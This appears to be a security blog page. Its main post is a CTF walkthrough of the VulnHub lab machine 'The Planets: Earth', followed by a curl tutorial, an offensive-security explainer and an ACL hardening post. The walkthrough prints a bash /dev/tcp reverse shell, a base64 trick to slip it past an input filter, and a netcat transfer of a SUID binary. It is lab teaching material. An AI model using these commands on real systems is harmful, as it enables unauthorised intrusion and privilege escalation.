Capture the Flag

VulnHub Walkthrough – The Planets: Earth

The Planet Earth
Previously, we took a look at an intentionally vulnerable VM from VulnHub called The Planets: Mercury. This time, I’m going to tackle another one in the same series by the same author called The Planets: Earth. You can download the file to play along from here. Setup will actually be almost the same as it was in the Mercury post, so if you need help getting started, check back there.

I skipped planetary order because Venus was labelled as a “Medium” box and Earth is considered on the harder side of easy, so I wanted to step this up slowly as we go. As it turns out, this box definitely poses some challenges of its own. I may well have missed an easier path, but I went in the most straightforward way I could find. I also had a misstep or two, and I’ll point out where I went down a trail without taking you there myself.

After I got the box running and figured out its IP address like last time, I ran the following command to see what was going on. I ran it with sudo so nmap could use its faster, privileged SYN scan. -p- scans all 65535 ports, -sC runs the default scripts, -sV probes for service versions, and -T4 uses a more aggressive timing template so the scan finishes sooner.

sudo nmap -p- -sC -sV -T4 192.168.56.104

Not shown: 65512 filtered tcp ports (no-response), 20 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_http-title: Earth Secure Messaging
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local

From our results, we can see that 3 ports are open: 22, 80, and 443. Those are the ports for SSH, HTTP, and HTTPS respectively. Just like last time, we save port 22/SSH for later, as that is often mid-to-endgame stuff in capture the flag boxes if web servers are present. I note that there are some DNS names to consider: earth.local and terratest.earth.local. Because 2 sites are potentially being hosted on one box, we’ll need to add those names to our hosts file so that we can use them in the web browser to get the sites we want.

I type the command sudo nano /etc/hosts in my Kali Linux virtual machine and add this line to the bottom. After that, I save and exit, and from then on I can just refer to the box by those easier names rather than the IP address.

192.168.56.104  earth.local     terratest.earth.local

When I go to http://earth.local, it brings up the “Earth Secure Messaging Service”.
The default earth.local site

When I enter a message of a with a key of a, I get 00 back. When I enter a message of a with a key of b, I get 03. I made a note of this, checked the source of the HTML page, and didn’t find anything else of value.
My resulting messages

Going to https://terratest.earth.local/ brings up “Test site, please ignore.” in plain text, and the source is the same, so that’s not helpful for gaining a foothold. I will note that if you go to the http:// version of the terratest site, it just shows you the earth.local messaging site.

When in doubt, enumerate! Let’s use gobuster to see what we can see! For our command, dir means directory mode, --url tells gobuster what URL to enumerate, -w is the wordlist to use, and -k tells it to skip SSL certificate validation (necessary here because this box has a self-signed cert and the check would otherwise fail).

gobuster dir --url https://earth.local -w /usr/share/wordlists/dirb/common.txt -k
/admin                (Status: 301) [Size: 0] [--> /admin/]
/cgi-bin/             (Status: 403) [Size: 199]

gobuster dir --url https://terratest.earth.local -w /usr/share/wordlists/dirb/common.txt -k
/.hta                 (Status: 403) [Size: 199]
/.htaccess            (Status: 403) [Size: 199]
/.htpasswd            (Status: 403) [Size: 199]
/cgi-bin/             (Status: 403) [Size: 199]
/index.html           (Status: 200) [Size: 26]
Progress: 2933 / 4615 (63.55%)[ERROR] Get "https://terratest.earth.local/nokia": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/robots.txt           (Status: 200) [Size: 521]
Progress: 4614 / 4615 (99.98%)

So, the regular site has an /admin page and the test site has a robots.txt file and maybe a /nokia directory. However, /nokia was just a hiccup from the tool (a timeout), as I got an immediate 404 when I tried to browse there. Let’s take a look at the robots.txt at https://terratest.earth.local/robots.txt

User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*

I’m not sure why the extension on testingnotes got left off; maybe to slow us down? I tried different extensions: .txt, .html, .htm, .xml, and even no extension, but only .txt returned anything. Here’s what we got:

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

First note: this also suggests a testdata.txt file might be available, and https://terratest.earth.local/testdata.txt gives us this:

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

Okay, that was some fast and furious fact finding. Let’s take stock of what we know now or might know.

Potential Username: terra
Encryption Used: XOR

If you already know everything there is to know about XOR, you can skip ahead a bit. If not, here’s a little explanation of what I’m about to do. XOR is commutative, like multiplication or addition: it doesn’t matter which input you call the message and which you call the key, the answer will be the same. It also works in reverse. If you XOR the result with the message, you get the key; if you XOR the result with the key, you get the message. Let’s see this in action with CyberChef. A CyberChef tutorial is outside the scope of this blog post (maybe a future one!), but take a look at what happens when I use a as the message and b as the key, and then b as the message and a as the key. Either way, it comes out to 03.
An XOR Proof of Concept for Encryption

Now, what happens when 03 is passed in and a is the key? We get b as the message. And when 03 is passed in as the result and b is the key? a shows as the message.
An XOR Proof of Concept for Decryption
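
If you’d rather prove this to yourself without CyberChef, a few lines of Python (my own quick sketch, nothing from the box) show the same behavior:

# XOR is symmetric: the same operation encrypts and decrypts,
# and swapping "message" and "key" makes no difference.
a, b = ord('a'), ord('b')        # 0x61 and 0x62
print(format(a ^ b, '02x'))      # 03 -- the result the site gave us
print(chr((a ^ b) ^ a))          # b  -- the result XORed with one piece gives the other
print(chr((a ^ b) ^ b))          # a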

It looks like we have one of the pieces (either the key or the message) in the testdata.txt file. We also have the resulting ciphertext from the earth.local site. If I plug them in just like the proof of concept, I should get the other piece.
XOR Missing Piece Found

We get the string earthclimatechangebad4humans repeated over and over again.

earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

Because of the way it is repeated and cut off, that probably means earthclimatechangebad4humans was the key and “According to radiometric dating…” was the message. Let’s try again with the same ciphertext input but only earthclimatechangebad4humans as the key. When we do, we get back the text from testdata.txt perfectly.
Decrypting with only the 28 character passphrase
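
Here’s the same trick in a few lines of Python, using the key and the testdata.txt text we now know, just to show why XORing the ciphertext with a known plaintext spits the repeating key back out (my own sketch, not part of the box):

# Repeating-key XOR: ciphertext XOR known plaintext = the key stream, repeated.
from itertools import cycle

key = b"earthclimatechangebad4humans"
plaintext = (b"According to radiometric dating estimation and other evidence, "
             b"Earth formed over 4.5 billion years ago.")

ciphertext = bytes(p ^ k for p, k in zip(plaintext, cycle(key)))  # what the site produced
recovered = bytes(c ^ p for c, p in zip(ciphertext, plaintext))   # XOR back with the plaintext
print(recovered.decode())  # earthclimatechangebad4humansearthclimatechange...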

Note: I tried the other messages that were on the page when we first got there, but only the initial message decrypted cleanly with that key, so there’s no further gold to mine there. The notes mentioned that terra was a username for the admin portal, and I had forgotten about it until now. If the key isn’t the password, we’ll have to try SQL injection or credential stuffing. When we go to https://earth.local/admin, we get a link to log in. Clicking it reveals a form. Here is what that looks like.

The Admin Login Page

Fortunately, terra:earthclimatechangebad4humans were the login credentials we needed, and we are presented with the admin page, ripe for some good old command issuing. whoami comes back apache.
Admin Login Success

Let’s try to find the user flag, which on Sir Proton’s boxes usually seems to be named user_flag.txt. I asked the command box to find that file, got a path back, then used cat to output the file. Flag 1 Complete!

find / -name "user_flag.txt"
Command output: /var/earth_web/user_flag.txt
cat /var/earth_web/user_flag.txt
Command output: [user_flag_3353b67d6437f07ba7d34afd7d2fc27d] 

Can I find the root flag the same way?

find / -name "root_flag.txt"
Command output: 

Drat! Gonna have to work at this the hard way. Can I SSH into the box with these credentials? No, I cannot. Okay, that means we have to use this admin portal to get a reverse shell. Let me see what we have on the server; do we have bash?

which bash
Command output: /usr/bin/bash

Okay, bash is here and usable, so let’s do a bash-based reverse shell. If we go to RevShells.com, we can find all we need to do it. Just fill in what you want and you get the command to issue on your local machine and the command to execute on the target to call back to you.
My RevShells for this box

I issued those commands and got this

nc -lvnp 4444 # On the Kali Box
bash -i >& /dev/tcp/192.168.56.103/4444 0>&1 # In the admin CLI text box

Site Response: Remote connections are forbidden. 

D’OH! They must have something that parses the incoming text looking for IP addresses or something similar. Let’s see if hiding the command with base64 gets it done:

echo "bash -i >& /dev/tcp/192.168.56.103/4444 0>&1" | base64 # On Kali Machine
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMy80NDQ0IDA+JjEK # Result
nc -lvnp 4444 # On Kali Box
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMy80NDQ0IDA+JjEK" | base64 -d | bash # In the admin CLI text box

#Back on Kali...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.104] 53594
bash: cannot set terminal process group (832): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$ 

whoami
apache

Yahtzee! I tried sudo -l like we did in Mercury to find what we could execute as sudo, but I don’t know apache‘s password, so that doesn’t work. The next bit of low-hanging fruit is to check whether the SUID bit is set on any binaries, which would let me execute them as if I were their owner. I asked my buddy ChatGPT how to do that and got this command:

find / -perm /4000 -type f 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

Well, reset_root sounds promising. Let me call it

reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

Okay. What is it checking exactly? I can’t easily tell on this box where I’m a very low-privileged user, so I need to get this binary over to my own box. Python was available, so I copied the binary to /tmp, tried python3 -m http.server from /tmp, and tried to connect. It didn’t work. I tried a bunch of ports and none of it worked. So, I asked ChatGPT again and explained what I needed, and my robot friend suggested I use netcat on both ends. Here is what worked:

nc -lvp 9001 > reset_root # On Kali
listening on [any] 9001 ... # Kali Response

nc 192.168.56.103 9001 < /usr/bin/reset_root # In my reverse shell terminal

connect to [192.168.56.103] from earth.local [192.168.56.104] 54190 # Kali Terminal updated with this message

And I had a file locally. I did a sudo chmod +x ./reset_root so I could run it. I asked ChatGPT and it suggested a few programs to see what was being checked; two of them were strace and ltrace. When I used strace to see what it was doing...

strace ./reset_root     
execve("./reset_root", ["./reset_root"], 0x7ffd2af42c30 /* 55 vars */) = 0
brk(NULL)                               = 0x67b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff2fff5d000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=114611, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 114611, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff2fff41000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P~\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1933688, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1985936, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff2ffd5c000
mmap(0x7ff2ffd82000, 1404928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7ff2ffd82000
mmap(0x7ff2ffed9000, 348160, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17d000) = 0x7ff2ffed9000
mmap(0x7ff2fff2e000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1d1000) = 0x7ff2fff2e000
mmap(0x7ff2fff34000, 52624, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff2fff34000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff2ffd59000
arch_prctl(ARCH_SET_FS, 0x7ff2ffd59740) = 0
set_tid_address(0x7ff2ffd59a10)         = 3872
set_robust_list(0x7ff2ffd59a20, 24)     = 0
rseq(0x7ff2ffd5a060, 0x20, 0, 0x53053053) = 0
mprotect(0x7ff2fff2e000, 16384, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ)     = 0
mprotect(0x7ff2fff8f000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7ff2fff41000, 114611)          = 0
newfstatat(1, "", {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0
getrandom("\xc4\xad\x58\x5b\x45\x55\x52\x3f", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x67b000
brk(0x69c000)                           = 0x69c000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0)                           = ?
+++ exited with 0 +++

Well, that's a lot. The answer is probably in there, but let's see if ltrace is more concise.

ltrace ./reset_root
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)              = 38
access("/dev/shm/kHgTFI5G", 0)                           = -1
access("/dev/shm/Zw7bV9U5", 0)                           = -1
access("/tmp/kcM0Wewe", 0)                               = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)              = 44
+++ exited (status 0) +++

Well, that's easier to see. And I can now see that those 3 access() lines were at the end of the strace output too; I just didn't know what to look for. So, I *think* reset_root is just checking whether those files exist. Back in my reverse shell, I issued these four commands to create the three files and then ran reset_root again.

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
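
For what it’s worth, my mental model of what the binary is doing, based only on the strace/ltrace output above, is something like this little Python sketch (a guess at the logic, not the actual source):

# A guess at reset_root's logic, reconstructed from the access() calls we saw.
import os

triggers = ["/dev/shm/kHgTFI5G", "/dev/shm/Zw7bV9U5", "/tmp/kcM0Wewe"]

print("CHECKING IF RESET TRIGGERS PRESENT...")
if all(os.access(path, os.F_OK) for path in triggers):
    print("RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth")
    # the real SUID binary presumably resets the root password at this point
else:
    print("RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.")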

Okay. So, can I switch to root and get the flag? Yep!

su root # Earth as password when prompted
whoami
root
cd /root
ls
anaconda-ks.cfg
root_flag.txt
cat root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

We have achieved Root and Captured the Flag

There we have it. As far as I can tell, SSH being open was a rabbit hole and so were the other messages. I'm not sure if there was a better way to tell what reset_root was checking for, but if you were able to follow along and learn something, that's great! If you have any tips about how you may have solved this box differently, let me know.

General Tips

Core Tools to Know: curl

'curl'-y pig's tail
As all bloggers eventually find out, two of the best reasons to write blog posts are either to document something for yourself for later or to force yourself to learn something well enough to explain it to others. That’s the impetus of this series that I plan on doing from time to time. I want to get more familiar with some of these core tools and also have a reference / resource available that is in “Pete Think” so I can quickly find what I need to use these tools if I forget.

The first tool I want to tackle is curl. In the world of command-line tools, curl shines as a flexible utility for transferring data over various network protocols. Whether you’re working on the development side, the network admin side, or the security side, learning how to use curl effectively can be incredibly beneficial. This blog post will guide you through the very basics of curl, cover some common use cases, and explain when curl might be a better choice than wget.

What is curl

curl (Client for URL) is a command-line tool for transferring data with URLs. It supports a wide range of protocols including HTTP, HTTPS, FTP, SCP, TELNET, LDAP, IMAP, SMB, and many more. curl is known for its flexibility and is widely used for interacting with APIs, downloading files, and testing network connections.

Installing curl

Before diving into curl commands, you need to ensure it is installed on your system. Lots of operating systems come with it. In fact, even Windows has shipped with curl in Windows 10 and 11.

For Linux:

sudo apt-get install curl  # Debian/Ubuntu
sudo yum install curl      # CentOS/RHEL

For macOS:

brew install curl

For Windows:
You can download the installer from the official curl website if it isn’t already on your system. To check, just type curl --help at the command prompt and see if it understands the command. If you get something back like this, you’re all set.

C:\Users\peteonsoftware>curl --help
Usage: curl [options...] <url>
 -d, --data <data>           HTTP POST data
 -f, --fail                  Fail fast with no output on HTTP errors
 -h, --help <category>       Get help for commands
 -i, --include               Include response headers in output
 -o, --output <file>         Write to file instead of stdout
 -O, --remote-name           Write output to file named as remote file
 -s, --silent                Silent mode
 -T, --upload-file <file>    Transfer local FILE to destination
 -u, --user <user:password>  Server user and password
 -A, --user-agent <name>     Send User-Agent <name> to server
 -v, --verbose               Make the operation more talkative
 -V, --version               Show version number and quit

This is not the full help, this menu is stripped into categories.
Use "--help category" to get an overview of all categories.
For all options use the manual or "--help all".

The Simplest Example

The simplest way to use curl is to fetch the contents of a URL. Here is a basic example that will print the HTML content of the specified URL to the terminal:

c:\
λ curl https://hosthtml.live
<!doctype html>
<html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_M6heeSY2n3p1IRsqfcIljkNrgqYXDBDFSWeybupIpyihjfHMZhFu8kniDL51hLxUnYHjgmcv2EYUtXfRDcRWZQ==" lang="en" style="background: #2B2B2B;">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC">
    <link rel="preconnect" href="https://www.google.com" crossorigin>
</head>
<body>
<div id="target" style="opacity: 0"></div>
<script>window.park = "eyJ1dWlkIjoiZDFhODUxY2ItOTUyZi00NGUyLTg4ZWMtMmU3ZGNhZmE1OTk0IiwicGFnZV90aW1lIjoxNzIwNzMyMzQxLCJwYWdlX3VybCI6Imh0dHBzOi8vaG9zdGh0bWwubGl2ZS8iLCJwYWdlX21ldGhvZCI6IkdFVCIsInBhZ2VfcmVxdWVzdCI6e30sInBhZ2VfaGVhZGVycyI6e30sImhvc3QiOiJob3N0aHRtbC5saXZlIiwiaXAiOiI3Mi4xMDQuMTY5LjE1NCJ9Cg==";</script>
<script src="/bwjblpHBR.js"></script>
</body>
</html>

Some Useful Examples to Actually Do Stuff

Downloading Files

# To download a file and save it with a specific name:
curl -o curlypigtail.jpg https://peteonsoftware.com/images/202407/curlytail.jpg

# If you want to save the file with the same name as in the URL:
curl -O https://peteonsoftware.com/images/202407/curlytail.jpg

Sending HTTP Requests

# GET requests are used to retrieve data from a server. The basic example is already shown above. 
# To include headers in the output, use the -i option:
curl -i https://hosthtml.live

# POST requests are used to send data to a server. 
# This is particularly useful when interacting with APIs. 
curl -X POST -d "param1=value1&param2=value2" http://somereallygreat.net/api

# Many APIs now accept JSON.  This is how you'd send that
curl -X POST -H "Content-Type: application/json" -d '{"key1":"value1", "key2":"value2"}' http://somereallygreat.net/api

# Without explaining it, we included a header above (-H).  That added a Content-Type header.  
# To add an Auth header, you might do something like this
curl -H "Authorization: Bearer token" http://asitethatneedsbearertokens.com

Cookies

# To save cookies from a response
curl -c cookies.txt https://www.google.com

# To send cookies with a request
curl -b cookies.txt https://www.google.com

When to Use curl Over wget

While both curl and wget are used to transfer data over the internet, they have different strengths. Daniel Stenberg is the creator of curl (and also contributes to wget) and he’s published a more lengthy comparison here. I defer to the expert, but here are some of my big takeaways.

curl Advantages

  • Flexibility: curl supports a wider range of protocols (like SCP, SFTP) and provides more options for customizing requests.
  • Availability: curl comes preinstalled on macOS and Windows 10/11. wget doesn’t.
  • Pipelining: curl can be used to chain multiple requests together, making it powerful for scripting complex interactions.
  • Reuse: curl is built on a library (libcurl) that you can embed in your own applications, while wget is just a command-line tool.

wget Advantages

  • Recursive Downloads: wget can download entire websites recursively, making it ideal for mirroring sites.
  • Simplicity: For simple downloading tasks, wget might be more straightforward and easier to use.

curl is a versatile tool that – once mastered – can simplify many network-related tasks. From downloading files to interacting with APIs, curl provides the flexibility and functionality needed for a wide range of applications. While wget has its strengths, particularly for simple downloads and recursive website copying, curl shines in its versatility and extensive options for customizing requests.

InfoSec

Understanding Offensive Security

A robot arm holding a robotic sword over a laptop representing Offensive Security
At first blush, Offensive Security can seem like an oxymoron or a misnomer. Are we saying that the best defense is a good offense? Not really. When people say that in the traditional sense, they usually mean that by attacking, you don’t give your opponent a chance to attack you, therefore there is less for you to defend against. That’s not what we’re doing here. We are not out attacking the “bad guys” in an attempt to tie up their resources to keep them from attacking us. What we’re really talking about is attacking ourselves internally or through a third party vendor.

Offensive security refers to proactive measures taken to identify, assess, and mitigate vulnerabilities within a system before malicious hackers can exploit them. Unlike defensive security, which focuses on protection and prevention, offensive security involves simulating attacks to uncover weaknesses and bolster defenses. This approach is also known as ethical hacking or penetration testing.

The hacking is “ethical” because the people performing the exercise have permission to do it, share all of their results with the target, and don’t keep, use, or share with the outside world any vulnerabilities or data they might uncover. Penetration testing (pen testing) is a process that involves simulating cyberattacks to identify vulnerabilities in a system, network, or application. Ethical hackers use the same techniques as malicious actors to find and fix security flaws.

Taking this up a notch is something called Red Teaming. Red teaming is an advanced form of penetration testing where a group of security professionals, known as the red team, emulates real-world cyberattacks over an extended period. Their goal is to test the organization’s detection and response capabilities. These groups also perform vulnerability assessments, which involve systematically examining systems for vulnerabilities, typically using automated tools. While less thorough than penetration testing, vulnerability assessments provide a broad overview of potential security issues. In addition, offensive security professionals will often use social engineering attacks that exploit human psychology rather than technical vulnerabilities, conducting phishing simulations and other exercises to test an organization’s security awareness.

So that explains a little of what these teams do, but let’s consider a little more of the why.

  • Proactive Defense: Offensive security allows organizations to identify and address vulnerabilities before they can be exploited by attackers. By staying one step ahead, companies can significantly reduce the risk of data breaches and other security incidents.
  • Improving Security Posture: Regular penetration testing and vulnerability assessments provide actionable insights that help organizations strengthen their security posture. This ongoing process ensures that defenses evolve in response to emerging threats.
  • Compliance and Regulatory Requirements: Many industries have strict compliance and regulatory standards that mandate regular security testing. Offensive security practices help organizations meet these requirements and avoid potential fines and penalties. I can tell you that in several recent audits and compliance engagements, the assessors wanted evidence that we regularly conduct offensive security operations against our own company.
  • Incident Response Preparedness: Red teaming exercises and other offensive security activities help organizations test and refine their incident response plans. This ensures that in the event of a real attack, the organization is prepared to respond quickly and effectively.

Ethical Hackers (or White Hat Hackers) are the backbone of offensive security. We’re talking about individuals who have the skillset to “be the bad guys” (Black Hat Hackers), but instead earn a living helping others be prepared. The important thing, though, is that you don’t have to be born a hacker, spend time in the seedy underbelly of the internet, or wear all black to go into this field. There is a lot of reputable training available and some respected certifications that can help your employment chances in the field (CEH and OSCP, to name two).

If you’re interested, give it a shot. There is almost no barrier to entry. Sites like TryHackMe and HackTheBox have free tiers, and there are tons of YouTube channels offering training, walkthroughs, and advice. I plan on spending a fair amount of time in future posts talking about various security topics, often from the offensive security angle, and working through some of the problems available on sites like TryHackMe, HackTheBox, and VulnHub. That way I can give back a little and add one more resource to the pile in gratitude for what has been given to me, so stay tuned for that.

InfoSec

Locking Down Mercury

A composite image of Mercury behind cartoon jail bars, both images from Pixabay
In my last post, I did a walkthrough for the VulnHub box The Planets: Mercury. This box was conceived and implemented to be low-hanging fruit for people who enjoy Capture the Flag (CTF) exercises. The fixes for much of what we used to gain our initial foothold are pretty basic, and the advice should be familiar to anyone who takes security hygiene seriously and certainly to anyone running a production web server. Additionally, Injection (SQL and otherwise) is consistently on the OWASP Top 10; it should be checked and remediated early, but often isn’t. Nevertheless, we weren’t splitting atoms to find it or to suggest how to fix it. Here are the basic “Don’ts” from the Mercury CTF:

  • Don’t leave default error pages in place
  • Don’t leave public “to do” lists
  • Don’t construct SQL Queries using blind concatenation
  • Don’t leave text files with passwords in plain text (or any encoding) on the server

But none of those are how we gained root on the box. We took advantage of a misconfiguration on the server that was intended to let the user read from a log file. The Mercury box wanted to allow the user to read records from the /var/log/syslog file. Normally, that file requires elevated permissions to read. The Admins on this example box chose to create a script that reads the last 10 lines from the file and then gave the user permission to run sudo on this script. Unfortunately, we were able to use a symlink and a PATH trick to make that script ultimately open a root shell for us instead.

But what could the Admins have done differently? The best solution here is probably using Access Control Lists (ACLs). Linux file systems have supported these by default for a few generations. To work with them, we can just install a package and then configure the permissions.

Take a look at these simple commands that could have prevented this avenue of privesc on Mercury.

# Install the acl package
# In Debian-based systems
sudo apt-get install acl
# In RedHat-based systems
sudo yum install acl

# See if your file system supports ACLs
grep acl /etc/mke2fs.conf

# If they do, you will see acl in the default mount options
default_mntopts = acl,user_xattr

# If not, you should be able to run this command to set it up
# This has not been tested by me, as every Linux box I could find already had the permissions
sudo mount -o remount,acl /

# Looking at the ACL on the file to start, we see that the owning user (syslog) has read and write,
# the adm group has read, and everyone else has no permissions.
getfacl /var/log/syslog

# Output
getfacl: Removing leading '/' from absolute path names
# file: var/log/syslog
# owner: syslog
# group: adm
user::rw-
group::r--
other::---

# Now I'm going to configure a user to have read permissions using
# setfacl which was added when we installed the acl package
sudo setfacl -m u:exampleuser:r /var/log/syslog

# Let's check again
getfacl /var/log/syslog

# Output
getfacl: Removing leading '/' from absolute path names
# file: var/log/syslog
# owner: syslog
# group: adm
user::rw-
user:exampleuser:r--
group::r--
mask::r--
other::---

# You notice that now we have another user row in the output, saying
# that exampleuser has read permissions on the file

That’s it! It took me less than two minutes in total, and this avenue of escalation could have been prevented. This is a good example of how thinking like an attacker can make you a better administrator: consider how every change you make to a system could be exploited, and then think about a better way. When in doubt, look for guidance; don’t get “creative”.

Capture the Flag

VulnHub Walkthrough – The Planets: Mercury

An image of the planet Mercury, from Pixabay
